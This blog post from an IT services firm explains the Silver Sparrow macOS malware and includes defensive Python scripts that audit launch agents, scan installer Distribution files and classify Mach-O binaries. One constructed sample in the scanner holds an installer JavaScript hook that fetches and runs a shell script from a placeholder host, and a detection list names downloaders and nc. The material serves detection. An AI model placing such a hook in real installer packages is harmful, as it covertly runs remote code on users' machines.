Silver Sparrow: Things You Did Not Know About This macOS Malware
Just when you think you know all about macOS threats, a new kind comes around. In February 2021, Red Canary researchers identified a new macOS malware family that installs a launch agent to keep itself running and checks in with a remote server for instructions. The discoverers dubbed this new threat Silver Sparrow. The following post describes why Silver Sparrow matters, what sets it apart from other malware, and the steps we are taking to keep systems free from its grasp.
What Is a Launch Agent, and How Does it Affect Silver Sparrow?
A launch agent is a property list (plist) file stored in one of the LaunchAgents folders on macOS (~/Library/LaunchAgents for a single user, /Library/LaunchAgents for all users of the machine) that tells launchd, the macOS service manager, to run a program automatically, typically when the user logs in or on a repeating schedule.
Attackers may create their own launch agent or modify one that is already installed, then use it to run their code over and over again, at every login or every few minutes. A disguised launch agent can act as a sleeper cell on a workstation or inside a network. It sits there unobserved, checking in with the attacker's server for as little as a few seconds or as long as a few months, until the instruction arrives to unload the attack on the unsuspecting network.
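One practical way to hunt for the persistence technique described above is to read every launch agent plist and flag the ones that look like a beacon rather than a vendor updater. The following audit script is an added example, not code from the original post and not Silver Sparrow's own files; the two plists embedded in it are constructed for illustration (the labels, paths and 3600-second interval are assumptions, chosen to mimic the shell-one-liner-on-a-timer pattern rather than copied from any real sample).

```python
"""Audit macOS launch agent plists for suspicious persistence (added example)."""
import plistlib
import re

# Interpreters and downloaders that a legitimate launch agent rarely invokes directly.
SUSPICIOUS_PROGRAMS = {"sh", "bash", "zsh", "curl", "osascript", "python", "python3", "perl"}
# Locations an ordinary user can write to without admin rights.
USER_WRITABLE = re.compile(r"^(/Users/[^/]+/|/tmp/|/private/tmp/|/var/folders/)")

# Constructed sample: the shape of a normal vendor updater agent.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/Applications/Example.app/Contents/MacOS/Updater</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

# Constructed sample: a shell one-liner from a user-writable folder, re-run every hour.
SUSPECT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>init_agent</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>~/Library/Application Support/agent_updater/agent.sh</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>3600</integer>
</dict></plist>"""


def audit_launch_agent(plist_bytes: bytes) -> dict:
    """Parse one launch agent plist; return its label, program and a list of findings."""
    data = plistlib.loads(plist_bytes)
    args = data.get("ProgramArguments") or ([data["Program"]] if "Program" in data else [])
    label = data.get("Label", "")
    findings = []
    if not args:
        findings.append("no Program or ProgramArguments")
        return {"label": label, "program": None, "findings": findings}
    program = args[0]
    basename = program.rsplit("/", 1)[-1]
    if basename in SUSPICIOUS_PROGRAMS:
        findings.append(f"runs an interpreter or downloader directly: {program}")
    joined = " ".join(args)
    if "~/" in joined or USER_WRITABLE.search(joined):
        findings.append("references a user-writable path")
    if "-c" in args and basename in {"sh", "bash", "zsh"}:
        findings.append("shell one-liner in ProgramArguments")
    if data.get("StartInterval"):
        findings.append(f"re-runs every {data['StartInterval']} s (beaconing pattern)")
    # Vendors almost always use reverse-DNS labels such as com.vendor.product.
    if not re.match(r"^[A-Za-z0-9-]+\.[A-Za-z0-9-]+\.", label):
        findings.append(f"label is not reverse-DNS style: {label!r}")
    return {"label": label, "program": program, "findings": findings}


if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_PLIST), ("suspect", SUSPECT_PLIST)):
        print(name, audit_launch_agent(blob))
```

On a real Mac you would feed it the contents of each file in ~/Library/LaunchAgents and /Library/LaunchAgents and compare the labels against `launchctl list`; an agent with several findings, especially a shell one-liner that runs on a short interval from a path under the user's home folder, deserves a closer look.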
Silver Sparrow works a bit differently from other malware that abuses launch agents. For one thing, Silver Sparrow relies on JavaScript for its installation logic. Instead of the preinstall and postinstall shell scripts that most macOS installer packages use, it runs its commands through the JavaScript API that the macOS Installer exposes to a package's Distribution file, which is a far less common place for security tools to look.
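To see what that looks like in practice, the script below scans the Distribution file of an installer package for JavaScript that launches external programs. It is an added example, not code from the original post or from the malware itself. The two Distribution documents embedded in it are constructed; the function name, URL and paths in the suspect one are assumptions that illustrate the pattern (a JavaScript hook that calls `system.run`, one of the Installer JavaScript API's documented ways to execute a program) rather than strings taken from any real sample.

```python
"""Scan an installer package's Distribution file for JavaScript that runs programs (added example)."""
import re
import xml.etree.ElementTree as ET

# Installer JavaScript API calls that execute an external program.
EXEC_CALL = re.compile(r"system\.run(?:Once)?\s*\(([^)]*)\)")
DOWNLOADERS = ("curl", "wget", "osascript", "python", "nc ")

# Constructed sample: an ordinary package with no scripting at all.
BENIGN_DISTRIBUTION = b"""<installer-gui-script minSpecVersion="1">
  <title>Example Updater</title>
  <choices-outline><line choice="default"/></choices-outline>
  <choice id="default"><pkg-ref id="com.example.updater"/></choice>
  <pkg-ref id="com.example.updater" version="1.0">#updater.pkg</pkg-ref>
</installer-gui-script>"""

# Constructed sample: an installation-check hook (run automatically before the user
# clicks Install) whose JavaScript downloads and executes a shell script.
SUSPECT_DISTRIBUTION = b"""<installer-gui-script minSpecVersion="1">
  <title>Updater</title>
  <installation-check script="checkReady()"/>
  <script><![CDATA[
  function checkReady() {
      system.run('/bin/sh', '-c', 'curl -s https://example.invalid/update.sh -o /tmp/update.sh; sh /tmp/update.sh');
      return true;
  }
  ]]></script>
  <choices-outline><line choice="default"/></choices-outline>
  <choice id="default"><pkg-ref id="com.example.updater"/></choice>
  <pkg-ref id="com.example.updater" version="1.0">#updater.pkg</pkg-ref>
</installer-gui-script>"""


def scan_distribution(xml_bytes: bytes) -> dict:
    """Return the JS hooks Installer runs automatically and every program-execution call found."""
    root = ET.fromstring(xml_bytes)
    # installation-check and volume-check hooks fire without any user interaction.
    hooks = [
        f"{el.tag}: {el.get('script')}"
        for el in root.iter()
        if el.tag in ("installation-check", "volume-check") and el.get("script")
    ]
    calls = []
    for script in root.iter("script"):
        for match in EXEC_CALL.finditer(script.text or ""):
            argtext = match.group(1).strip()
            calls.append({
                "args": argtext,
                "shell": bool(re.search(r"/bin/(ba|z)?sh", argtext)),
                "downloader": any(tool in argtext for tool in DOWNLOADERS),
            })
    suspicious = any(c["shell"] or c["downloader"] for c in calls)
    return {"hooks": hooks, "exec_calls": calls, "suspicious": suspicious}


if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_DISTRIBUTION), ("suspect", SUSPECT_DISTRIBUTION)):
        print(name, scan_distribution(blob))
```

On a Mac, `pkgutil --expand suspect.pkg out/` unpacks a flat package and writes its Distribution file into the output folder; reading that file into `scan_distribution` shows whether the package can run anything before a single preinstall script is reached.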
A second reason it is unique has to do with Apple's M1, the first Apple Silicon (ARM64) chip. Apple announced in June 2020 that it would move the Mac from Intel processors to its own Apple Silicon, and the first M1 Macs shipped in November 2020. Because the platform is so new, there had been few threats built for it. That changed with the discovery of Silver Sparrow, which ships a universal binary compiled natively for the M1. In the samples analyzed so far that binary is only a "bystander": it does nothing but display a placeholder message and does not interfere with the platform. What matters is that the delivery and persistence machinery around it already works on Apple Silicon and could be updated to carry something harmful.
How Do Computers Get Infected With Silver Sparrow?
Cybersecurity experts are not yet sure how the infection begins. The installer may be pushed through compromised ads or websites, fake ads, or fake Flash updates. Its proven global spread suggests that it is not the work of a lone actor.
Cybersecurity experts do not believe this malware attacks platforms other than Macs. There are, however, two versions of Silver Sparrow: one compiled for Intel Macs only, and one universal binary that also runs natively on the new Apple Silicon platform.
In addition, thanks to Rosetta 2, Apple's translation layer that lets Intel-compiled programs run on Apple Silicon, even the Intel-only version of the malware runs on an M1 Mac. Naturally, the malware benefits from that compatibility just as legitimate software does.
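The difference between the two versions comes down to the Mach-O header: a universal binary starts with a "fat" header listing one entry per architecture, while an Intel-only binary starts with a single 64-bit Mach-O header for x86_64. The parser below, an added example that is not part of the original post, reads just those bytes and classifies a file the way the paragraph above describes. The two inputs are constructed headers (the offsets, sizes and alignments in them are placeholders), not real malware samples.

```python
"""Classify a Mach-O file as universal, Intel-only or arm64-only from its header (added example)."""
import struct

FAT_MAGIC = 0xCAFEBABE        # universal ("fat") binary; its header is always big-endian
MH_MAGIC_64 = 0xFEEDFACF      # 64-bit thin Mach-O; stored in the target CPU's byte order
CPU_TYPE_X86_64 = 0x01000007  # CPU_TYPE_X86 | CPU_ARCH_ABI64
CPU_TYPE_ARM64 = 0x0100000C   # CPU_TYPE_ARM | CPU_ARCH_ABI64
CPU_NAMES = {CPU_TYPE_X86_64: "x86_64", CPU_TYPE_ARM64: "arm64"}


def mach_o_architectures(blob: bytes) -> list:
    """Return the CPU architectures in the file: several for a universal binary, one for a thin one."""
    if len(blob) < 8:
        raise ValueError("too short to be a Mach-O header")
    if struct.unpack(">I", blob[:4])[0] == FAT_MAGIC:
        nfat = struct.unpack(">I", blob[4:8])[0]
        archs = []
        for i in range(nfat):
            # struct fat_arch: cputype, cpusubtype, offset, size, align (all 32-bit, big-endian)
            off = 8 + i * 20
            cputype = struct.unpack(">IIIII", blob[off:off + 20])[0]
            archs.append(CPU_NAMES.get(cputype, hex(cputype)))
        return archs
    # Thin 64-bit Mach-O: x86_64 and arm64 are both little-endian, so try that order first.
    for order in ("<", ">"):
        magic, cputype = struct.unpack(order + "II", blob[:8])
        if magic == MH_MAGIC_64:
            return [CPU_NAMES.get(cputype, hex(cputype))]
    raise ValueError("not a recognised Mach-O header")


def classify(blob: bytes) -> str:
    """Say how the file would execute on an M1 Mac."""
    archs = mach_o_architectures(blob)
    if "arm64" in archs and "x86_64" in archs:
        return "universal (runs natively on Intel and on Apple Silicon)"
    if archs == ["x86_64"]:
        return "Intel-only (runs on Apple Silicon through Rosetta 2)"
    if archs == ["arm64"]:
        return "arm64-only (Apple Silicon only)"
    return "other: " + ", ".join(archs)


def fat_header(*cputypes) -> bytes:
    """Build a constructed universal header; only the fields the parser reads are meaningful."""
    hdr = struct.pack(">II", FAT_MAGIC, len(cputypes))
    for i, cputype in enumerate(cputypes):
        hdr += struct.pack(">IIIII", cputype, 3, 0x4000 * (i + 1), 0x1000, 14)
    return hdr


# Constructed inputs, not real samples.
UNIVERSAL_SAMPLE = fat_header(CPU_TYPE_X86_64, CPU_TYPE_ARM64)
INTEL_ONLY_SAMPLE = struct.pack("<II", MH_MAGIC_64, CPU_TYPE_X86_64) + b"\0" * 24

if __name__ == "__main__":
    print("universal sample:", classify(UNIVERSAL_SAMPLE))
    print("intel-only sample:", classify(INTEL_ONLY_SAMPLE))
```

On a Mac, `file` or `lipo -archs` on a binary gives the same answer; this version shows where that answer comes from, which is useful when triaging a sample on a machine that is not running macOS.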
What Does Silver Sparrow Do?
As of February 17, 2021, Silver Sparrow had been detected on 29,139 macOS endpoints in 153 countries. The countries with the heaviest detected infiltration are the US, Germany, UK, Canada, and France. Security researchers are concerned about Silver Sparrow even though no final payload has been observed yet, because the malware:
- Runs natively on Apple Silicon
- Has already shown global reach
- Has a high infection rate
- Could deliver a significant malicious payload quickly and efficiently once its operators choose to
This particular malware also includes a self-removal routine. Its hourly check-in script looks for a specific marker file on disk and, if it finds one, deletes the launch agent and the rest of its installed components. In other words, it can make itself disappear almost as easily as it appeared, leaving little trace behind.
Silver Sparrow's design looks like the beginnings of a large botnet: the infected machines lie in wait for instructions to drop a malicious payload. At the very least, the malware consumes computer resources and network bandwidth with its periodic check-ins. It may also expose information about the network.
What Can Networks Do to Prevent an Attack?
Apple has revoked the developer certificates used to sign the Silver Sparrow installer packages, so new copies no longer pass Gatekeeper, and says the malware is no longer spreading. Apple is expected to add detection for it to the built-in malware protections of macOS, including the version that runs on Apple Silicon.
While waiting for those updates, however, many small to mid-size businesses in Middle Georgia and Alabama enjoy managed IT services as clients of Acom Integrated. Silver Sparrow targets macOS by using the macOS Installer to execute malicious commands that hide inside a signed package. Because it tries to look like a normal installation, many malware detection engines have difficulty spotting it. We are proud to say that you are in good hands with respect to this latest attack on Macs. Thanks to the security teams of our channel partners, we detect the presence of Silver Sparrow before it harms your system.
Because no one has so far identified a payload attributable to Silver Sparrow, IT security experts think that this malware is still in its development phase. That makes it all the more critical to deal with Silver Sparrow before we hear about payloads being dropped.
The malware removal tool that we use to protect our clients not only detects the appearance of Silver Sparrow, it also prevents the malware from delivering any payload.
Moving Forward
Since experts expect the Silver Sparrow malware to keep evolving, our managed IT service staff keep their eyes open for signs that Silver Sparrow has finished laying its foundations and is ready to attack. We use the latest malware detection and removal tools, and we continually strive to improve cybersecurity.
If you would like to talk more about this topic or anything else with one of our security experts, please contact us. We look forward to helping you keep your network secure from cyber hackers.
To learn more about Silver Sparrow and Apple's response, you may enjoy the article from pcmag.com entitled "Apple Takes Action Against Silver Sparrow Malware Discovered on 30K Infected Macs".